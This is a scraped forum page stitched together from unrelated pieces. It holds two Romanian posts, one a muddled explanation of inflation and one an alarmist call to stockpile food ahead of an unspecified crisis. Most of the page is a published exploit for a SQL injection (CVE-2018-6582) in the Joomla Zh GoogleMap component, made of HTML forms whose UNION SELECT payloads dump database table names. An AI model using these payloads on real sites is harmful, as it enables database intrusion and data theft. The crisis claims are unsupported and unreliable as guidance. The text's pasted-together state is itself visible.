Leaderboard

https://www.blackhat.com/asia-18/presenters/Ionut-Popescu.html

Nu e chiar asa.. bani se pot imprima oricand.. dar treaba e ca daca sunt mai multi (la modul extrem de a dubla toti banii din lume) o sa fie acelasi cacat pentru ca valoare bacnotei o sa fie mai putina.. adica daca ai salariul acum de 100 de euro si o paine e 1 euro, dupa ce se dubleaza banii o sa ai salariud de 200 euro si painea o sa coste 2 euro.. in ritmul asta o sa ajungem sa platim o suta de mii de euro pe o paine si sa avem salarii de milioane de euro. Dupa o sa apara moneda euro-new care 1 euro-new o sa coste 100.000 euro, si schimbam din nou, ca de la lei vechi la lei noi (ca si exemplu). Si asa mereu si mereu ca intro bucla. Banii nu dispar, nu se pierd, avem aceeasi suma de bani "globala", doar ca suntem din ce in ce mai multi care ne gandim cum sa ne luam bucatia de acolo ca sa fim milionari si sa ii tinem la saltea. In cazul asta cum in circulatie sunt mai putini bani atunci valoare lor tinde sa creasca, si acolo apare saracia Pentru ca daca toata lumea ia salariu dublu, ala de unde cumperi tigari urca pretu ca vrea si el mai multi bani, si tot asa... Banii sunt un produs care are o valoare, exact ca un litru de benzina. Daca avem bacnote mai multe (aka banii mai multi) valoarea lor scade, exact ca si cand avem mai multa benzina, costa mai ieftin. Nu stiu, daca m-am explicat sau daca ma intelegi...

Faceti-va rezerve de mancare conservata si apa pentru vreo 3-4 luni. Cu 300 - 400 lei rezolvati, cat sa aveti pentru voi si familie. Nu e mult, nu aveti ce pierde. Asta trebuia sa se intample cu mult inainte dar ma rog nu e locul si nici cazul sa povestim prea mult. Treceti peste ce zic "analistii" ca aia dispar primii din schema in caz de alarma. Se sustine ca "nu urmeaza o criza" ca sa nu se duca dracu de tot si bursa dar si alte piete comerciale, ca de or incepe sa vanda toti ca tampitii, o sa ne batem pe crenvusti de acum in 2-3 saptamani. De ce nu a crapat economia acum mai putin de un an .. America a devenit propriul sau jucator la bursa, asemanator fiind cazul Chinei care a bagat mana in rezerva de bani pentru zile negre sa-si umfle piata bursiera.

Joomla! Zh GoogleMap component version 8.4.0.0 suffers from a remote SQL injection vulnerability. <!-- # # # # # # Exploit Title: Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection # Dork: N/A # Date: 04.02.2018 # Vendor Homepage: http://zhuk.cc/ # Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-googlemap/ # Software Download: http://zhuk.cc/files/pkg_zhgooglemap-j30-8.4.0.0-final.zip # Version: 8.4.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-6582 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # Want To Donate ? # BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ # ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2 # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # # # # # --> <html> <body> <!--com_zhgooglemap/controller.php--> <!--# 1)--> <!--L 30: public function getPlacemarkDetails() {........}--> <form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkDetails" method="post"> <input name="id" value="-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--" type="hidden"> <input type="submit" value="1-Ver Ayari"> </form> <!--# 2)--> <!--L 363: public function getPlacemarkHoverText() {........}--> <form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkHoverText" method="post"> <input name="id" value="-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22--" type="hidden"> <input type="submit" value="2-Ver Ayari"> </form> <!--# 3)--> <!--L 418: public function getPathHoverText() {........}--> <form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPathHoverText" method="post"> <input name="id" value="-33 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e336f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33--" type="hidden"> <input type="submit" value="3-Ver Ayari"> </form> <!--# 4)--> <!--L 763: public function getPathDetails() {........}--> <form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPathDetails" method="post"> <input name="id" value="-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44--" type="hidden"> <input type="submit" value="4-Ver Ayari"> </form> </body> </html> Source: https://dl.packetstormsecurity.net/1802-exploits/joomlazhgooglemap8400-sql.txt